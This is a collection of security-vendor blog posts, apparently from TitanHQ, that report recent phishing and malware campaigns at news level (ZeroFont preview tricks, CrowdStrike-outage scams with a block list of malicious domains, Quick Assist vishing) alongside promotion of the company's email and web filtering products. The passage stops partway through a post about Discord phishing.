PhishTitan adds advanced threat detection capabilities through machine learning and LLM to identify the zero-day and emerging threats that are missed by Defender. PhishTitan provides real-time protection against phishing links in emails in addition to checks performed when the email is received. URLs are rewritten for Link Lock protection with all links reassessed at the point a user clicks to ensure that URLs that have been made malicious after delivery are detected and blocked. If the link is detected as malicious, access to that URL will be prevented.

PhishTitan also adds banner notifications to emails to alert users to unsafe content and emails from external sources, and the auto-remediation feature allows all threats to be instantly removed from the entire mail system, with robust cross-tenant features for detection and response for MSPs.

PhishTitan has also been developed to be quick to set up and configure. There is no need to change MX records, setup typically takes less than 10 minutes, and the solution is incredibly easy to manage. Why put up with inferior threat detection and complex interfaces, when you can improve the Office 365 phishing protection with an easy-to-use anti-phishing solution

Don’t take our word for it though. Take advantage of the free trial of PhishTitan to see for yourself. Product demonstrations can also be arranged on request.

ZeroFont Phishing Scam Targets Microsoft 365 Users

A ZeroFont phishing campaign is being conducted that targets Microsoft 365 users. Rather than using the ZeroFont technique to hide malicious content from anti-spam software, this method aims to trick end users into thinking the email is genuine and safe.

The ZeroFont phishing technique was first identified in phishing attempts around five years ago, so it is not a new technique; however, this version uses a novel approach. When an email is sent to a business user, before that email is delivered it will be subject to various checks by the anti-spam server. The business’s anti-spam solution will perform reputation checks, scan the email for malware, and analyze the content of the email to search for signs of spam or phishing. Only if those checks are passed will the message be delivered to the end user. ZeroFont is a technique for hiding certain words from email security solutions to ensure that the messages are not flagged as spam and are delivered.

According to Check Point, Microsoft is the most commonly impersonated brand in phishing emails. If a threat actor impersonates Microsoft, they obviously cannot send the email from the Microsoft domain as they do not have access. Spam filters will check to make sure that the domain from which the email is sent matches the signature, and if there is no match, that is a strong signal that the email is not genuine. With ZeroFont, the signature used would only display Microsoft to the end user, and the spam filter is presented with a nonsensical string of text. The user would not see that text as the padding text around the word Microsoft is set to a font size of zero, which means the text is machine-readable but cannot be seen by the user.

A recent campaign uses the ZeroFont techniques but with a twist. In this campaign, the aim is not to trick a spam filter but to instead trick Outlook users. In Outlook, it is possible to configure the mail client with a listing view option, which will show the user the first lines of text of an email. The problem for phishers is getting Outlook users to engage with the messages, which means the messages must be sufficiently compelling so as not to be deleted without opening them. This is especially important if the sender of the email is not known to the recipient.

The email was detected by Jan Kopriva, who noticed that ZeroFont was used to make the message appear trustworthy by displaying text indicating the message had been scanned and secured by the email security solution, rather than showing the first lines of visible content of the message. This was achieved by using a zero font size for some of the text. The threat actor knew that the first lines of the emails are displayed by the mail client in the listing view, regardless of the font size, which means if the font is set to zero, the text will be displayed in the listing view but will not be visible to the user in the message body when the email is opened.

The email used a fake job offer as a lure and asked the user to reply with their personal information: Full name, address, phone number, and personal email, and impersonated the SANS Technology Institute. The full purpose of the phishing attempt is not known. There were no malicious links in the email and no malware attached so the email would likely pass through spam filters. If a response is received, the personal information could be used for a spear phishing attempt on the user’s personal email account, which is less likely to have robust spam filtering in place, or for a voice phishing attempt, as we have seen in many callback phishing campaigns.

Security awareness training programs train employees to look for signs of phishing and other malicious communications, and they are often heavily focused on embedded links in emails and attachments. Emails such as this and callback phishing attempts lack the standard malicious content and as such, end users may not identify them as phishing attempts. It is important to incorporate phishing emails such as this in security awareness training programs to raise awareness of the threat.

That is easy with SafeTitan from TitanHQ, as is conducting phishing simulations with these atypical message formats. SafeTitan includes a huge library of security awareness training content, and the phishing simulator includes thousands of phishing templates from real-world phishing attempts. It is easy for businesses to create and automate comprehensive security awareness training programs for the workforce and provide training on how to identify novel techniques such as this when they are identified, to ensure employees are kept up to date on the latest tactics, techniques, and procedures used by cybercriminals.

CrowdStrike Phishing and Malware Distribution Scams Mount Following Outage

CrowdStrike has confirmed that a significant proportion of Windows devices that were rendered inoperable following a faulty update last Friday have now been restored to full functionality; however, businesses are still facing disruption and many scams have been identified by cybercriminals looking to take advantage.

One of those scams involves a fake recovery manual that is being pushed in phishing emails. The emails claim to provide a Recovery Tool that fixes the out-of-bounds memory read triggered by the update that caused Windows devices to crash and display the blue screen of death. The phishing emails include a document attachment named “New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows. docm.” The document is a copy of a Microsoft support bulletin, which claims that a new Microsoft Recovery Tool has been developed that automates recovery by deleting the CrowdStrike driver that is causing the crash. The user is prompted to enable content; however, doing so will allow a macro to run, which will download a malicious DLL, which launches the Daolpu stealer – an information stealer that collects and exfiltrates credentials, login information, and cookies stored in Chrome and Firefox.

Another campaign has been identified that capitalizes on the defective Falcon Sensor update. The spear phishing campaign targeted German firms and attempts to distribute a fake CrowdStrike Crash Reporter installer via a website that spoofs a legitimate German company. The website was registered a day after the CrowdStrike disruptions started. If the user attempts to download the installer by clicking the download button in the email, a ZIP archive will be delivered that includes a malicious InnoSetup installer. If executed, the user is shown a fake CrowdStrike branded installer. The installer is password-protected to prevent analysis and the final payload could not be determined.

Another campaign attempts to distribute Lumma information-stealing malware. The campaign uses the domain, crowdstrike-office365[.]com, and tricks the recipient into downloading a fake recovery tool to deal with the boot loop that prevents Windows devices from booting up. If the downloaded file is executed, it delivers a malware loader, which will, in turn, deliver the Lumma infostealer.

These are just three campaigns that use the CrowdStrike outage to deliver malware, all of which use email as the way to make contact with individuals affected by the outage. Many other campaigns are being conducted and a large number of CrowdStrike-themed domains have been registered since the problems started. Other malicious domains used in campaigns include the following, all of which should be blocked.

crowdstrike-helpdesk.com

crowdstrike.black

crowdstrikefix.zip

crowdstrikebluescreen.com

crashstrike.com

fix-crowdstrike-bsod.com

crowdstrike-falcon.online

crowdstrike-bsod.com

crowdstrikedoomsday.com

crowdstrikedown.site

crowdstrikefix.com

isitcrowdstrike.com

crowdstriketoken.com

crowdstrike0day.com

crowdstrikeoutage.com

These scams are likely to continue for some time, so it is important to remind employees of the high risk of malicious emails and warn them to exercise extreme caution with any emails received. Employees should be told to report any suspicious emails to their security team.

TitanHQ offers a range of cybersecurity solutions to block phishing and malware distribution campaigns, all of which are quick and easy to implement and can protect you in a matter of minutes. They include the WebTitan web filter for blocking access to known malicious websites, such as those detailed in this email; the PhishTitan anti-phishing solution for Office 365, and the SpamTitan corporate email filter for blocking phishing emails. The latter incorporates email sandboxing for blocking novel and obfuscated malware threats. TitanHQ also provides a comprehensive security awareness training platform and phishing simulator for improving your human defenses by raising awareness of cyber threats and providing timely training content on the latest tactics used by cybercriminals in targeted attacks on employees.

Give the TitanHQ team a call today for further information on improving your defenses, or take advantage of the free trial available with all TitanHQ products to get immediate protection.

Surge in Fake Websites and Phishing Related to CrowdStrike Windows Outage

On July 19, 2024, Windows workstations and servers were disabled as a result of a bug in a software update for CrowdStrike Falcon Sensor. When the update was installed on Windows devices, it caused them to show the Blue Screen of Death or get stuck in a boot loop, rendering the devices unusable. Microsoft revealed that its telemetry showed 8.5 million Windows devices had been affected in around 78 minutes.

CrowdStrike Falcon platform is a cybersecurity solution that incorporates anti-virus protection, endpoint detection and response, threat intelligence, threat hunting, and security hygiene, and it is used by many large businesses around the world, including around half of Fortune 500 firms. The disruption caused by the update has been colossal. Airlines had to ground flights, airports were unable to check people in, healthcare providers were unable to access electronic patient records and had to cancel appointments and surgeries, financial institutions faced major disruption, and some media companies were unable to broadcast live television for hours. Even organizations that did not use the Falcon product were adversely affected if any of their vendors used the product. The incident has been called the worst-ever IT outage, with huge financial implications.

It did not take long for cybercriminals to take advantage of the chaos. Within hours, cybercriminals were registering fake websites impersonating CrowdStrike offering help fixing the problem, and domains were registered and used in phishing campaigns promising a rapid resolution of the problem. Given the huge financial impact of suddenly not having access to any Windows devices, there was a pressing need to get a rapid resolution but the fixes being touted by cybercriminals involved downloading fake updates and hotfixes that installed malware.

Those fake updates are being used to deliver a range of different malware types including malware loaders, remote access Trojans, data wipers, and information stealers, while the phishing campaigns direct users to websites where they are prompted to enter their credentials, which are captured and used to access accounts. Cybercriminals have been posing as tech specialists and independent researchers and have been using deepfake videos and voice calls to get users to unwittingly grant them access to their devices, disclose their passwords, or divulge other sensitive codes.

CrowdStrike has issued a fix and provided instructions for resolving the issue, but those instructions require each affected device to be manually fixed. The fix was rolled out rapidly, but CrowdStrike CEO George Kurtz said it will likely take some time for a full recovery for all affected users, creating a sizeable window of opportunity for threat actors. Due to the surge in criminal activity related to the outage, everyone should remain vigilant and verify the authenticity of any communications, including emails, text messages, and telephone calls, and only rely on trusted sources for guidance.  The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has reminded all organizations of the importance of having robust cybersecurity measures in place to protect their users, assets, and data, and to remind all employees to avoid opening suspicious emails or clicking on unverified links in emails.

It is important to have multiple layers of security protection to identify, detect, and avoid these attacks, including AI-driven phishing protection, web filtering to block access to malicious websites, anti-virus software to detect and neutralize malware, and security awareness training for employees. TitanHQ can help to secure your business in all of these areas and offers a cloud-based spam filtering service (SpamTitan) which includes email sandboxing and email antivirus filter, phishing protection for Office 365 (PhishTitan), and the SafeTitan security awareness training and phishing simulator.

Is Your Business Prepared for a Summer of Scams?

Phishing attacks and business email compromise scams are leading causes of losses to cybercrime and attacks have increased in 2024. According to the Federal Bureau of Investigation, phishing is the leading cause of complaints to its Internet Crime Complaint Center and business email compromise currently ranks second out of all tracked forms of cybercrime in terms of total losses.

Over the coming days and weeks, there are several events that cybercriminals take advantage of in their attacks and scams. The UEFA European Football Championship is currently taking place in Germany and thousands of individual phishing campaigns have been detected so far that are piggybacking on the popularity of the championship in Europe and beyond.

Cybercriminals often take advantage of sporting events and commonly use lures related to tickets, which usually sell out months before the first football is kicked and this year is no exception. Now that the tournament is underway and broadcasters and other legitimate entities are running competitions offering free tickets to the finals, scammers are doing the same and are using email and social media networks to advertise their scams. These campaigns use realistic websites that are almost identical to the brands they spoof and attempt to steal sensitive information such as credit card numbers and login credentials.

Many of the phishing attacks and scams impersonate businesses associated with the tournament. These include accommodation providers, airlines and travel companies, and others. The Wimbledon tennis tournament is underway, which will be shortly followed by another major sporting event in Paris – The 2024 Olympics. The latter has a huge global audience and there is a high risk of cyber threat activity using Olympics-themed lures. Cybercriminals are impersonating event organizations, sponsors, ticketing systems, and travel companies. Many cyber espionage groups and nation-state actors are likely to target the Olympics, in addition to financially motivated threat actors.

This week, there is a major celebration in the United States on July 4. Independence Day is a very active time for a host of malicious actors who conduct scams related to the celebrations, including holiday-themed texts and emails, fake giveaways and vouchers, and Independence Day event ticket scams. Being a major holiday in the United States when staffing levels are greatly reduced, it is a time when many ransomware groups choose to strike as their activities are less likely to be identified.

Also on July 4, 2024, a major event is taking place across the Atlantic in the UK. The UK general election will be taking place to decide the next government and scammers are already taking advantage and are using deepfake scams and malicious websites used to steal information and influence voters. It will be a similar story in the United States in the run-up to the November Presidential election.

With so many events taking place, it is vital for everyone to be on their guard and be constantly alert to the threat of scams, phishing, and malware attacks. Due to the elevated threat from phishing, businesses should step up their security awareness training to raise awareness of cyber threats and teach cybersecurity best practices. It is a good idea to use these events in your internal phishing simulations to identify any knowledge gaps and provide immediate training to any individual who fails a phishing simulation.

Security awareness training is made simple with SafeTitan from TitanHQ. SafeTitan is a comprehensive security awareness training platform that teaches security best practices to eradicate risky behaviors, raises awareness of the threat from phishing and malware, teaches the red flags to look for in emails and texts, and what to do if a potential threat is found. The phishing simulator can be used to automate internal phishing simulations to test awareness of threats and how employees are applying their training.

It is also a good time for businesses to bolster email security with an advanced email security solution. SpamTitan from TitanHQ is an advanced email security solution that uses predictive techniques to identify malicious emails, including AI and machine learning to block phishing threats and email sandboxing to block malware. SpamTitan integrates seamlessly with Microsoft 365 and is consistently rated as one of the best spam filters for Outlook, improving the native defenses that Microsoft offers. TitanHQ also offers a host of cybersecurity solutions for managed services providers, including advanced phishing protection, to help them better protect their clients.

If you want to improve protection this summer against increasingly sophisticated cyberattacks and scams, give the TitanHQ team a call to find out more about improving your security posture.

Malicious Email Campaign Deliver a Malware Cluster Bomb of Up to 10 Viruses

Many malware infections start with a malicious email that contains a file attachment with a malicious script that downloads malware if executed. One response to a single email is all it takes to infect the user’s device with malware, which may be able to spread across the network or at least provide the threat actor with the foothold they need in the network for follow-on activities. There is a much worse scenario, however. Rather than a single user infecting the network with one malware variant, that single response to the malicious email results in multiple malware infections. One campaign has been identified that does just that. A malware cluster bomb is delivered that can infect the user’s device with up to 10 different malware variants.

The campaign was identified by researchers at KrakenLabs and has been attributed to a threat actor known as Unfurling Hemlock. The campaign is being conducted globally with at least 10 countries known to have been attacked, although most of the victims have so far been located in the United States. The campaign has been running since at least February 2024 and uses two methods to deliver the malware variants – malicious emails and malware loaders installed by other threat groups. The threat actor has already distributed hundreds of thousands of malicious files in the 5 months since the operation is believed to have commenced.

In the email campaign conducted by Unfurling Hemlock, the victim is tricked into downloading a file called WExtract.exe which contains nested cabinet files, each containing a different malware variant. If the file is executed, the malware is extracted in sequence, and each malware variant is executed in reverse order, starting with the last malware variant to be extracted. Each malware cluster bomb has between four and seven stages, with some of those stages delivering multiple malware variants.

The malware variants delivered vary but they consist of information stealers, backdoors, malware loaders, and botnets. Information stealers include Redline Stealer, Mystic Stealer, and RisePro, and malware loaders including Amadey and SmokeLoader. Other malware variants are used to disable security solutions such as Windows Defender, help with obfuscation and hiding malware payloads, gathering system information, and reporting on the status of the malware infections.

It is not clear how the threat actor is using these malware infections. They could be delivering malware for other threat actors and selling the access, using the malware to harvest credentials to sell on the darkweb, conducting their own attacks using whatever malware variant serves their purpose, or a combination of the three. What the attack does ensure is maximum flexibility, as there are high levels of redundancy to ensure that if some of the malware variants are detected, some are likely to remain.

The delivery of multiple malware variants means this campaign could be highly damaging, but it also increases the chance of detection. While antivirus software is a must and may detect some of the malware variants, others are likely to go undetected. The key to blocking attacks is to prevent the initial phishing emails from reaching end users and to provide training to the workforce to help with the identification and avoidance of these malicious emails.

Many email security solutions rely on antivirus engines to detect malware but cybercriminals are skilled at bypassing these signature-based defenses. TitanHQ’s SpamTitan anti-spam software, SpamTitan, uses dual antivirus engines as part of the initial checks but also email sandboxing for behavioral analysis. Suspicious emails are sent to the sandbox where files are unpacked and their behavior is analyzed in depth. The behavioral analysis identifies malicious actions, resulting in the messages being quarantined for further analysis by the security team. SpamTitan also includes AI and machine-learning algorithms to check how messages deviate from the emails typically received and can identify new threats that have previously not been seen. SpamTitan is a highly effective Microsoft 365 spam filter and can be provided as a gateway spam filter or a cloud-based anti-spam service.

End user training is an important extra layer of security that helps eradicate bad security practices and teaches employees how to recognize and avoid malicious emails. Should a malicious bypass email security defenses, trained employees will be more likely to recognize and report the threat to the security team. Training data from SafeTitan, TitanHQ’s security awareness training platform and phishing simulator, shows the training and phishing simulations can reduce susceptibility to email attacks by up to 80% when provided regularly throughout the year.

Give the TitanHQ sales team a call today for more information on these and other cybersecurity solutions to improve your defenses against the full range of cyber threats.

A Cost-Effective Way to Improve Office 365 Email Filtering

Around 40% of businesses use Office 365 for email, which includes Exchange Online Protection (EOP) with standard licenses for blocking spam and other email threats. While EOP will block a substantial amount of unwanted spam emails and malicious emails, the level of protection provided falls well below what many businesses need as too many threats pass through undetected.

Businesses can opt for a more expensive Business Premium license to improve Microsoft’s spam filter for Office 365, as this license includes Defender for Office 365. Alternatively, businesses can pay for Defender as an add-on. While Defender improves the phishing detection rate, this security feature only adds a little extra protection to EOP, and many malicious emails still go undetected. The E5 license provides the greatest amount of protection but it is prohibitively expensive for many businesses, and even this license does not give you cutting-edge protection.

Fortunately, there is a way to improve Office 365 email filtering that will provide you with excellent protection against phishing, malware, spam, and other email threats without having to cover the cost of expensive licenses and add-ons. That solution is to use a third-party email security solution that augments the spam filter for Office 365 regardless of the license you have. Many businesses prefer to use a third-party solution rather than placing all of their trust in Microsoft – a company that has recently struggled with preventing hackers from compromising its own systems.

SpamTitan from TitanHQ is a cloud-based email security solution that integrates seamlessly with Office 365 to greatly increase protection against email threats such as phishing, business email compromise, malware, and data theft by insiders, and is easy to set up, configure, and manage.

There are several features of SpamTitan that are lacking in Microsoft’s security solutions. In addition to performing reputation checks and blocking known malicious email addresses and domains, SpamTitan uses predictive techniques for detecting spam and phishing emails, such as Bayesian analysis, machine learning, and heuristics. These features allow SpamTitan to detect and block zero-day phishing threats and business email compromise, which Microsoft struggles to detect and block.

SpamTitan performs extensive checks of embedded hyperlinks to combat phishing, including checks of Shortened URLs.  Office 365 malware detection is greatly improved with dual antivirus engines for detecting known malware and email sandboxing. The sandboxing feature includes machine learning and behavioral analysis for the safe detonation of files in an isolated environment, and message sandboxing is vital for detecting and blocking the zero-day malware threats that EOP and Defender miss.

SpamTitan cloud-based email filtering is also an ideal choice for Managed Services Providers looking to provide their customers with more advanced email security, especially for small- and medium-sized clients unwilling to pay for E5 licenses. SpamTitan has been developed from the ground up to meet the needs of MSPs and manage email security with minimal management overhead.

TitanHQ can also MSPs additional protection against phishing with TitanHQ’s new anti-phishing solution, PhishTitan. PhishTitan uses a large language model (LLM) and AI to analyze emails to identify phishing attempts. The solution incorporates multiple curated feeds to detect malicious URLs linked in phishing emails, adds banners to emails from external sources to warn end users about potential threats, and adds post-delivery remediation across multiple tenants allowing phishing emails to be instantly removed from the email system with a single click.

The best way to find out more about the full capabilities of SpamTitan and PhishTitan and how they work is to call the TitanHQ team. A product demonstration can be arranged and you can take advantage of a free trial to see for yourself the difference these solutions make and how they can significantly improve threat detection with Office 365.

New Campaigns Use Trojanized Software Downloaders to Distribute Dangerous Information Stealers

Two new malware distribution campaigns have been detected that deliver dangerous information-stealing malware, both targeting individuals looking to download free and pirated software.

Trojaninized Cisco Webex Meetings App Delivers Malware Loader and Information Stealer

Another malware distribution campaign has been identified that is using trojanized installers for free and pirated software to deploy a malware loader called Hijack Loader, which in turn delivers an information stealer. In the attacks, the victim was tricked into downloading a trojanized version of the Cisco Webex Meetings App, a video streaming app. The user downloaded a password-protected archive (RAR) file, which contained a file called setup.exe. When the victim executed the file, DLL sideloading was used to launch the HijackLoader, which was injected into a Windows binary.

HijackLoader connects with its command-and-control server and downloads another binary, an information stealer called Vidar Stealer. The malware bypasses User Account Control (UAC), escalates privileges, and adds an exception to the Windows Defender exclusion list. Vidar Stealer is used to steal credentials from browsers and deliver additional malware payloads, including a cryptocurrency miner. This campaign primarily targets organizations in Latin America and the Asia Pacific region.

Google Ads Used to Target Mac Users and Deliver Poseidon Malware

An information stealer called Poseidon is being distributed via malicious Google Ads that claim to provide the popular Arc web browser. The campaign targets Mac users and delivers a trojanized version of the Arc browser installer. If the installer is launched, the user gets the browser but is also infected with the malware.

According to an analysis from Malwarebytes, the new information stealer has similar features to the notorious Atomic Stealer, including a file grabber, crypto wallet extractor, and the ability to steal passwords from password managers such as Bitwarden and KeepassXC, passwords stored in browsers, and browser histories. The targeting of password managers makes this malware particularly dangerous, potentially allowing the theft of all passwords. The researchers believe the malware has been set up as a rival to Atomic Stealer

How to Protect Your Business

Protecting against malware requires a defense-in-depth approach to security, where several different security solutions provide multiple overlapping layers of protection. These security measures should include the following:

Antivirus software – Antivirus software is a must. The software will be able to detect malware when it is downloaded onto a device or is executed. The malware is identified by its signature, which means that a particular malware variant must be known and its signature must be present in the malware definition list used by that software. Antivirus software will not detect novel malware variants without behavioral analysis of files.

Web filter – One of the best defenses against malware distributed via the internet is a web filter. The web filter blocks downloads of malicious files by preventing downloads of executable files from the Internet, blocking access to known malicious websites, and limiting the sites that users can visit on their corporate-owned devices. The main advantage of a web filter is the threat is dealt with before any files are downloaded from the Internet.

Security awareness training – Users should be warned about the risks of downloading software from the Internet, be taught how to identify the signs of phishing and malicious emails, and be trained on security best practices. The latter should include carefully checking the domain of the website offering software and making sure it is the official website of the software vendor or a reputable software distributor.

Email security solution – Malware is often delivered via email, usually via a malicious script in an attached file or via a linked web page. An email security solution needs to have antivirus capabilities – signature-based detection and behavioral analysis in an email sandbox. The former will detect known malware variants and email sandboxing is used to detect novel malware variants.  Your email security solutions should also include AI-based detection, which can identify malicious messages based on how they differ from standard messages received by your business and perform comparisons with previous malware distribution campaigns.

While TitanHQ does not provide antivirus software, TitanHQ can help with web filtering (WebTitan), email security (SpamTitan), phishing protection (PhishTitan), and security awareness training (SafeTitan). For more information on improving your defenses against malware and TitanHQ’s multi-award-winning cloud-based email security and internet security solutions for businesses and managed service providers, give the TitanHQ team a call today.

More Than 50 Employee Email Accounts Compromised in Healthcare Phishing Attack

A phishing campaign targeting the Los Angeles Department of Public Health saw more than 50 employee email accounts compromised and the sensitive information of more than 200,000 individuals was exposed.

In this campaign, the threat actor impersonated a trustworthy sender and emailed a link that directed employees to a malicious website where email credentials were harvested. The website had been crafted to appear legitimate and requested they log in. When their credentials were entered, they were captured and used to access the employees’ email accounts. 53 employees fell for the scam. Their email accounts contained highly sensitive information that could be used for identity theft and fraud, including names, dates of birth, and Social Security numbers, as well as financial information and health insurance information. This campaign clearly demonstrates the damage that can be caused by phishing, and how a well-crafted campaign can fool many employees and result in a costly data breach.

While this phishing attack stands out due to the number of email accounts compromised, successful phishing attacks are common in healthcare. Healthcare employees are targeted via email, SMS, and other communication platforms, including over the phone. The Federal Bureau of Investigation and the Department of Health and Human Services recently issued a joint cybersecurity advisory about a campaign targeting IT helpdesk workers at healthcare organizations. Cybercriminals call IT helpdesks and impersonate employees to request password resets and enroll new devices to receive multifactor authentication codes. In this campaign, the attackers seek email credentials and then pivot to systems used for automated clearinghouse (ACH) payments to divert payments to their own accounts.

The Los Angeles Department of Public Health phishing attack serves as a reminder of the importance of conducting regular security awareness training. Employees need to be trained how to recognize phishing attempts. Through regular training, employees can be made aware of the red flags they need to look for in all communications and will be conditioned to be always on the lookout for threats and to report any potential threats to their security team. Healthcare employees who receive regular security awareness are less likely to be tricked by phishing scams. Training data from TitanHQ shows that organizations that conduct regular security awareness training with the SafeTitan security awareness training platform and phishing simulations using TitanHQ’s phishing simulator can reduce susceptibility to phishing scams by up to 80%.

The SafeTitan platform allows healthcare organizations to easily create and automate security awareness training programs and to tailor the training courses to different departments and users, ensuring that the training is relevant and focuses on the cyber threats that each user group is likely to encounter. The platform is modular, with each module taking no longer than 10 minutes to complete, making it easy for busy healthcare workers to fit the training into their workflows. The training content is engaging, fun, and enjoyable, and covers all threats and teaches cybersecurity best practices.

Phishing simulations can be easily conducted to test the effectiveness of training and identify employees who have not taken the training on board, allowing them to be provided with further training. The SafeTitan platform is the only security awareness training platform that delivers training in real-time in response to security mistakes, ensuring additional training is provided instantly at the moment when it is likely to have the greatest impact on changing behavior.

In addition to training, healthcare organizations must implement technical safeguards for HIPAA Security Rule compliance. TitanHQ offers a range of cloud-based security solutions for healthcare organizations to manage risks and achieve Security Rule compliance. These include SpamTitan anti-spam software which incorporates AI and machine learning algorithms to predict phishing attempts and dual antivirus engines and email sandboxing to combat malware.  The WebTitan web filter protects against internet-based threats and can be used to block access to malicious and risky websites and block executable file downloads from the Internet to combat malware. Healthcare organizations that use Microsoft 365 can improve phishing protection with PhishTitan – a next-generation AI-based anti-phishing solution that offers unmatched protection against phishing and allows rapid remediation of phishing threats, preventing phishing attempts from compromising multiple email accounts.

All TitanHQ solutions are quick and easy to implement and use and can help healthcare organizations achieve and maintain HIPAA compliance, block more threats, and avoid costly data breaches. Contact TitanHQ today for more information about improving your security posture.

Quick Assist Abused in Tech Support Scam Leading to Black Basta Ransomware Attack

Earlier this month, warnings were issued about the Black Basta ransomware group, after an increase in activity in recent weeks. Now a new tactic has emerged to gain initial access to networks that ultimately leads to a Black Basta ransomware attack.

Storm-1811 is a highly sophisticated financially motivated cybercriminal group that was first detected in April 2022. Unlike many cybercriminal groups that start slowly, Storm-1811 conducted more than 100 attacks in its first 7 months. The latest campaign linked to the group is a type of tech support scam and is conducted over the phone through voice phishing (vishing).

The threat actor targets users and uses social engineering techniques over the phone to convince the user that they need to take urgent action to fix a fictitious problem on their computer. The threat actor often impersonates a member of the IT help desk or even Microsoft technical support. This attack leverages Quick Assist – a legitimate Windows app that is used to establish a remote connection to a device.

Quick Assist is a useful tool for providing IT support. If a friend or family member is having difficulty with their computer, they can provide remote access to a more technically skilled family member to sort out the problem remotely. Through Quick Assist, it is possible to view the display, make annotations, and take full control of the connected device.

Any remote access tool can be abused by a threat actor and Quick Assist is no different.  If the user is convinced that the request is genuine and access to their device is granted, the threat actor will be able to perform a range of malicious actions. In this campaign, the threat actor installs a range of malicious tools to allow them to achieve their objectives, including remote monitoring and management (RMM) tools such as ScreenConnect and NetSupport Manager, and malware including Qakbot and Cobalt Strike. After gaining access, Storm-1811 actors can steal data and the access will ultimately lead to a Black Basta ransomware attack.

One point where this campaign could fail is convincing a user that they have a problem with their computer that requires remote access to fix. To get around this problem, Storm-1811 threat actors create a problem that needs to be addressed. One of the ways they do this is by conducting an email-bombing campaign. They identify email addresses of employees at the targeted company and bombard them with spam emails by signing them up to various high-volume email subscription services. When they make the call, the user will no doubt be frustrated by the spam emails, and it is easy to convince them that the problem can be sorted via Quick Assist.

The user just needs to press CTRL plus the Windows Key and Q to initiate Quick Assist, and then enter the security code provided by the threat actor and confirm that they want to proceed with screen sharing. The threat actor can then request remote access through the session and, if granted by the user, will be provided with full control of the user’s device. If they get to that point while the user is still on the phone, the threat actor will be able to explain any installation of a program as part of the remediation efforts. The threat actor can then unsubscribe the user from the various email subscriptions to make them believe that the problem has been resolved. Since the tools used by the threat actor can easily blend in, the attack is likely to go undetected until ransomware is used to encrypt files.

There are two easy ways to reduce susceptibility to this attack. The first is for IT teams to block or uninstall Quick Assist if they are not using the tool for remote access. Since other remote access tools may be used in these tech support scams, it is also vital to educate the workforce about tech support scams.

Users should be trained never to provide remote access to their device unless they initiate the interaction with their IT help desk or Microsoft support. Many companies provide security awareness training to the workforce that focuses on email phishing since this has long been the most common method of gaining access to internal networks.

Security awareness training should also educate users about other forms of phishing, including SMS phishing (smishing), vishing, and phishing via instant messaging services. With SpamTitan, creating, automating, and updating training content with the latest tactics used by cybercriminals is easy. The platform includes an extensive range of engaging training modules and is constantly updated with new content based on real-world attacks by cybercriminal groups.

When you train your workforce with SafeTitan, you can greatly reduce susceptibility to the different types of cyberattacks. Give the TitanHQ team a call today for further information or use the SafeTitan link to sign up for a free trial.

Phishing Is the Most Common Type of Cyberattack in the UK but BEC is the Costliest

Last month, the UK government published the findings of its 2024 cyber security breaches survey. The annual survey was conducted by the Department for Science, Innovation and Technology (DSIT) in partnership with the Home Office between September 2023 and January 2024 on 2,000 UK businesses, 1,004 registered UK charities, and 430 educational institutions. The survey provides insights into the nature of cyberattacks and data breaches experienced in the UK and confirms that attacks are increasing.

In the past year, 50% of surveyed businesses and almost one-third of charities (32%) experienced at least one cybersecurity breach or attack, with medium-sized businesses (70%), large businesses (74%), and high-income charities with £500,000+ annual income (66%) more likely to experience a cybersecurity breach.

It is often reported that cyberattacks are becoming more sophisticated; however, the most common cyber threats are relatively unsophisticated and are often effective. The most common type of cyberattack was phishing, which was reported by 84% of businesses and 83% of charities, with impersonation of organizations – online and via email – reported by more than one-third of businesses (35%) and charities (37%). Malware was used in 17% of attacks on businesses and 14% of attacks on charities. In terms of prevalence, phishing was by far the most common type of cybercrime. 90% of businesses and 94% of charities that were victims of cybercrime experienced at least one phishing attack.

The costliest type of phishing attack is business email compromise (BEC). BEC covers several types of attacks, with the most common involving criminals accessing work email accounts and using them to trick others into transferring funds or sending sensitive data. For example, a threat actor gains access to an email account of a vendor and uses the account to send an email to a customer containing a fake invoice or a request to change bank account information for an upcoming payment.

The losses to BEC attacks can be considerable. Attacks frequently result in fraudulent transfers of tens of thousands of pounds or in some cases hundreds of thousands or millions. With such large sums involved, criminals put considerable effort into these scams. Targets are researched, phishing is used to compromise an employee email account, internal phishing is used to gain access to the right accounts, the contents of accounts are studied to identify information that can be used in the scam, and the legitimate account holder is impersonated in the attack on the targeted organization or individual.

The goal in these attacks is often to gain access to the email account of the CEO or a senior executive, and that account is used to conduct a scam internally or externally. Since the request comes from a trusted authority figure and uses their legitimate account, the request is often not questioned.

BEC attacks can be difficult to identify by employees but also by email security solutions as trusted accounts are used for the scams and the emails usually do not contain any malicious content such as a URL to a phishing website or malware. These attacks use social engineering and target human weaknesses.

Defending against BEC and phishing attacks requires a combination of measures. Since targets are extensively researched, businesses should consider reducing their digital footprint and making it harder for cybercriminals to obtain information that can be used in convincing phishing and BEC campaigns, especially by reducing the amount of information that is available online about senior staff members.

Anti-spam software is a must for blocking the initial phishing attacks that are used to compromise accounts; however, an advanced solution is required to block sophisticated BEC attacks. TitanHQ’s cloud-based anti-spam service – SpamTitan – performs a barrage of spam checks for inbound and outbound emails to identify spam, phishing, and BEC content, including reputation checks of domains and accounts, scans of message content, sandboxing to identify malicious attachments, and AI and machine learning analysis to identify emails that deviate from the standard messages typically received by an organization.

PhishTitan is an anti-phishing solution for Microsoft 365 that enhances Microsoft’s anti-phishing measures and catches the phishing threats that Microsoft misses. The solution adds banners to emails to warn employees about potentially malicious content and allows security teams to quickly remediate phishing attempts across the entire email environment.

Since phishing and BEC attacks target human weaknesses, it is vital to provide training to the workforce. The aim should be to improve awareness and condition employees to always be on the lookout for a scam and to err on the side of caution and report suspicious emails to their IT security team. Phishing simulations are useful for helping staff to recognize phishing emails and identify knowledge gaps. TitanHQ’s SafeTitan training platform has all the content you need to run effective training programs to improve defenses against phishing and BEC attacks.

Contact TitanHQ today about these solutions and other ways you can improve your defenses against phishing, BEC, and other types of cyberattacks.

Discord Phishing Risk Increases with 50,000+ Malicious Links Detected in 6 Months

Phishing tactics are constantly changing and while email is still one of the most common ways of getting malicious content in front of end users, other forms of phishing are growing. Smishing (SMS phishing) has increased considerably in recent years, and vishing (voice phishing) is also common, especially for IT support scams.

Another method of malware delivery that has seen an enormous increase recently is the use of instant messaging and VoIP social platform Discord. Discord is a platform that has long been popular with gamers, due to being able to create a server with voice and text for no extra cost, both of which are necessary for teamspeak in gaming. While gamers still account for a majority of users, usage for non-gaming purposes is growing.

